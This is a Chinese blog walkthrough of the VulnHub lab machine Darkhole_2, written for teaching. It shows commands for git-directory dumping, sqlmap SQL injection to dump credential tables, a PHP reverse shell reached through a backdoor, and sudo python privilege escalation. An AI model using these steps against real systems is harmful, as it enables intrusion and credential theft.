Vulnhub_Darkhole_2

092baa68814fbe64f2828f6a0fa1e6ac.gif

本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关。

主机信息

kali:192.168.31.136
Darkhole_2:192.168.31.72

信息收集

使用netdicover发现目标主机IP为192.168.31.72

80a04196c2dac490c3956a6862e61cce.png

然后使用nmap对目标机器进行探测发现开放了22、80两个端口,并且80端口的网站有个git目录

nmap -A -p- 192.168.31.72

9894fdd1cebe1860b6c1a8d33c247b86.png

使用GitHack将数据dump下来

python2.7 GitHack.py http://192.168.31.72/.git/

f9806c4843c13ce6b8dd5e59a74ba438.png

查看配置文件找到了数据库配置文件

c9fbc08d43f41d5024bcdc6b42c405de.png

查看一下历史版本

git log

e3dbc7d4cdb0b065ea4492e58bb968ea.png

生成最新版的到backup目录

git clone . backup

ec972c1841e94d7bad00f1ea39d81908.png

通过切换分支得到一个有漏洞的版本

git checkout a4d900a8d85e8938d3601f3cef113ee293028e10

926b09278eba6b1ffcbe271079a0dfd2.png

查看源码得到一个用户名和密码

adf7a52c59cd59deb37263d69f7cd0db.png

使用这个密码成功登陆到后台

e3ed39a2d2704c81fbb59805309fc552.png

通过sqlmap跑了一下URL中的id存在SQL注入漏洞

sqlmap -r login_burp_get --dbs

06f2dccc61b8c763f2be7d2c3245b877.png

获取表名

sqlmap -r login_burp_get -D darkhole_2 --tables

07ed81c000795f367e3dc36bfdb30940.png

dump ssh表数据

sqlmap -r login_burp_get -D darkhole_2 -T ssh --dump

1841f32f8aecd8ba8b26f532394a7bc9.png

Dump users表数据

sqlmap -r login_burp_get -D darkhole_2 -T users --dump

3209a875a95aa20a459b4e87e91991f0.png

GETSHELL

使用获取到的密码登陆到服务器

f67130fa35d237f59988bc6ab7cad5a0.png

查看服务器文件,在losy用户的家目录下找到一个flag

bef1923ab65657ce904fce82756e7d13.png

在下载检测脚本的时候发现jehad的家目录下自动生成了一个les.sh的脚本,但是没有内容,初步判断应该存在定时任务

950c46f824c7aed27240bde11bf906ad.png

提权

通过脚本找到疑似存在下面的漏洞,单无法提权成功

d45cbdeb8f956002a6aa0a640903fa9d.png

查看进程信息发现有一个以losy身份监听9999端口的进程

7fbf7160b5f532174e8e3db899503ed1.png

查看代码发现是一个后门程序

c5467b310777acdbe7c4730ef0703598.png

通过尝试发现可以成功执行命令

c55a1bc505632ba81147f2e7debe9abf.png

执行下载木马

27dd1d497874eccbfe10bdde9b063e96.png

访问上传的木马得到shell

curl localhost:9999/php-reverse-shell.php

ef0d7bfaab6475abe3368b8359b29ea1.png

获取tty shell

python3 -c 'import pty;pty.spawn("/bin/bash")';
 export SHELL=bash
 export TERM=xterm-256color

8f642b085e287c8a07254de18a0cca49.png

查看历史命令发现用户名密码

fe2840c8f5d0ac8dd778f7e125de20dc.png

查看发现python可以以root权限执行

346dca1bf1614ae6d4091516c492323d.png

使用python提权到root

sudo python3 -c 'import os; os.system("/bin/sh")'

bb0592597e2244dd65c52d5964c1f166.png

获取root权限的Flag

af33b24d899d407af7b225c49c73dd5b.png

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

d7d4cffcb4a4019edec46d7d9645ee54.jpeg

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值